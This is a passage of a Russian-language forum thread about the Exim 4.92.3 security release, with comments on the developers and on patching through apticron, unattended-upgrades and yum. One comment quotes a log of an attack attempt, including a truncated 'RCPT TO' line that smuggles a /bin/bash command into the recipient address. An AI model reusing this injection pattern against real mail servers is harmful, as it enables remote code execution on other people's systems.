> **** log string overflowed log buffer ****
> SMTP<< ehlo mmmmbbbb…
> **** debug string too long - truncated ****

PS. Версия подопытного старовата для данной ошибки, но он же не предупредил (версию не сообщает, редиска). Ага, а хост оказывается и ранее уже был замечен в «подобных шалостях»…
> SMTP<< RCPT TO:root+${run{\x2Fbin\x2Fbash

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

99. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +1 +/
Сообщение от Аноним (11), 30-Сен-19, 13:59 
RCPT TO это был shell eval прямым текстом, сейчас нужно заполнить буфер что уже не тривиально для макак.
Ответить | Правка | ^ к родителю #82 | Наверх | Cообщить модератору

91. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от Аноним (91), 30-Сен-19, 12:50 
Начиная с 4.90 у них завёлся шпион похоже который хочет дыру встроить, а её всё находят.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

98. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +3 +/
Сообщение от Аноним (11), 30-Сен-19, 13:58 
Погромист у них завелся без сишной специализации и прохождения сертификации.
Ответить | Правка | ^ к родителю #91 | Наверх | Cообщить модератору

100. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  –2 +/
Сообщение от пох. (?), 30-Сен-19, 14:30 
обычная макака у них завелась, дыра у нее под хвостом, и из нее как раз и вываливается такой код.

Вангую, что находят-то как раз 1/10 того что там на самом деле понагуанокожено.

Ответить | Правка | ^ к родителю #91 | Наверх | Cообщить модератору

112. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +1 +/
Сообщение от Аноним (112), 30-Сен-19, 21:19 
И не говори, раньше такого не было: https://www.cvedetails.com/vulnerability-search.php?f=1&prod...
Ответить | Правка | ^ к родителю #91 | Наверх | Cообщить модератору

113. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от Licha Morada (?), 30-Сен-19, 21:29 
У нас (консалтинг и разработка в Мексике) Exim живёт на паре MX с CPanel, и серверах мониторинга с Debian. Последний месяц стало нескольно неуютно из-за этой плеяды дырок. Однако, что Debian, что CPanel, патчатся весьма оперативно.

Наша внутренняя документация не ахти какая прилизанная, но позволяет в течении нескольких секунд определить, на каких хостах установлен потенциально уязвимый пакет и оперативно пропатчить. В случае с CPanel же, к тому времени когда я туда поспеваю, оно всё уже само обновилось.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

117. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от бублички (?), 30-Сен-19, 23:33 
> позволяет в течении нескольких секунд определить, на каких хостах установлен потенциально уязвимый пакет и оперативно пропатчить

с простым скриптом apticron ты ещё и в свой почтовый ящик будешь получать эту информацию, так часто как настроишь (crontab). а если unattended-upgrades освоишь так вообще сможешь пить текилу круглый год

Ответить | Правка | ^ к родителю #113 | Наверх | Cообщить модератору

119. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от Licha Morada (?), 30-Сен-19, 23:59 
Спасибо, но боюсь что с apticron'ом многовато почты получится. А unattended-upgrades в планах.
Несколько лет назад, когда я повадился обновления на OS накатывать без взаимодействия с прикладниками, они очень ругались что новые версии библиотек им продукт ломают. А с взаимодействием, тогда получалось долго и дорого.
Сейчас времена изменились, мы много чего стандартизировали, и автоматизация ведёт себя более предсказуемо.
Ответить | Правка | ^ к родителю #117 | Наверх | Cообщить модератору

120. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от Аноним (11), 01-Окт-19, 02:00 
https://koji.fedoraproject.org/koji/packageinfo?packageID=1694
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

130. "Опубликован Exim 4.92.3 с устранением четвёртой за год крити..."  +/
Сообщение от Аноним (130), 02-Окт-19, 03:08 
el7: yum update --enablerepo=epel-testing exim
el6: yum update exim
Ответить | Правка | ^ к родителю #120 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Спонсоры:
Слёрм
Inferno Solutions
Hosting by Ihor
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2019 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру